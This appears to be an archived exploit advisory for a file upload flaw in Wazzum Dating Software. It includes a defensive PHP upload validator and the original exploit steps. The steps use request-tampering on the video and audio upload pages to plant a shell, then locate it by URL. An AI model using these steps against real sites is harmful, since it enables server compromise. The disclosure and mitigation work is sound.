Vendor: Wazzum Dating Software
By: El-Kahina
CVSS: 7.5 (HIGH)
CWE: 434 (Upload)
Product Name: Wazzum Dating Software
Affected Version From: N/A
Affected Version To: N/A
Patch Exists: NO
Related CWE: N/A
CPE: N/A
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: Linux
2010

Wazzum Dating Software Multi Vulnerability

A vulnerability in Wazzum Dating Software allows an attacker to upload malicious files to the server. After registering on the website, the attacker can use Tamper Data on the video and audio upload pages to upload malicious files. The uploaded files are then found in the includes/videos/ and includes/audios/ directories.

Mitigation:

Ensure that all user-supplied input is properly validated and sanitized before being used in any application logic.
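
What that validation can look like for the video (type=v) and audio (type=a) upload paths, as an added PHP example that is not Wazzum's code. The function names, the extension and MIME allow-list, and the 50 MiB size limit are assumptions.

```php
<?php
// Added example, not Wazzum code. MEDIA_RULES, MAX_BYTES, validate_media() and
// store_media_upload() are hypothetical; allow-list and size limit are assumed values.
const MEDIA_RULES = [
    // upload type => [allowed extension => MIME types accepted for it]
    'v' => ['mp4' => ['video/mp4'], 'webm' => ['video/webm']],
    'a' => ['mp3' => ['audio/mpeg'], 'ogg' => ['audio/ogg', 'application/ogg']],
];
const MAX_BYTES = 50 * 1024 * 1024;
// Returns the validated extension or throws. Nothing sent by the client is trusted.
function validate_media(string $tmpPath, string $clientName, string $type): string
{
    $rules = MEDIA_RULES[$type] ?? null;
    if ($rules === null) {
        throw new InvalidArgumentException('unknown upload type');
    }
    // The extension must be on the allow-list, so script extensions are rejected.
    $ext = strtolower(pathinfo($clientName, PATHINFO_EXTENSION));
    if (!isset($rules[$ext])) {
        throw new RuntimeException('extension not allowed');
    }
    $size = filesize($tmpPath);
    if ($size === false || $size === 0 || $size > MAX_BYTES) {
        throw new RuntimeException('bad file size');
    }
    // Sniff the type from the stored bytes. $_FILES[...]['type'] is set by the
    // client and can be rewritten in transit, so it is never consulted.
    $mime = (new finfo(FILEINFO_MIME_TYPE))->file($tmpPath);
    if (!in_array($mime, $rules[$ext], true)) {
        throw new RuntimeException('content does not match extension');
    }
    return $ext;
}

// $file is one $_FILES entry; keep $destDir outside the web root or non-executable.
function store_media_upload(array $file, string $type, string $destDir): string
{
    $tmp = $file['tmp_name'] ?? '';
    if (($file['error'] ?? UPLOAD_ERR_NO_FILE) !== UPLOAD_ERR_OK || !is_uploaded_file($tmp)) {
        throw new RuntimeException('upload failed');
    }
    $ext = validate_media($tmp, (string)($file['name'] ?? ''), $type);
    // Server-generated name: the client's filename never reaches the filesystem.
    $target = rtrim($destDir, '/') . '/' . bin2hex(random_bytes(16)) . '.' . $ext;
    if (!move_uploaded_file($tmp, $target)) {
        throw new RuntimeException('could not store upload');
    }
    return $target;
}
```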

Exploit-DB raw data:

========================================================================================
| ( Title    ) Wazzum Dating Software Multi Vulnerability
| ( Author   ) El-Kahina
| ( email    ) please forgive me
| ( Web Site ) wwww.iqs3cur1ty.com
| ( Script   ) http://hotfile.com/dl/32756801/c6b4b5e/Wazzum.zip.html
| ( Tested on) Linux Français v.(9.10 Ubuntu)
| ( Bug      ) Upload
|
======================      Exploit By EL-Kahina       =================================
 # Exploit  : 
 
 1 - Register - Step 1
 
 http://127.0.0.1/Wazzum/register.php?step=1&case=reg&PHPSESSID=fba9845f1d798c1bf4faf996e7789b4c
                  
 2 - Register - Step 2
 
 http://127.0.0.1/Wazzum/register.php?step=2&mode=create&case=reg (You Can Use Shell to Upload)
 
 3 - http://127.0.0.1/Wazzum//video_admin.php?type=v (2 upload video) Use Tamper Data
  
 http://127.0.0.1/Wazzum//includes/videos/ to find evil 
 
 http://127.0.0.1/Wazzum//audio_admin.php?type=a (2 upload audio) Use Tamper Data
 
 http://127.0.0.1/Wazzum//includes/audios/ to find evil
 
==========================================
Greetz : 
Exploit-db Team : 
(loneferret+Exploits+dookie2000ca)
(Dz-Ghost Team ) im indoushka's sister -#[V!va Fidal Castro]#-
--------------------------------------------------------------------------------------------------------------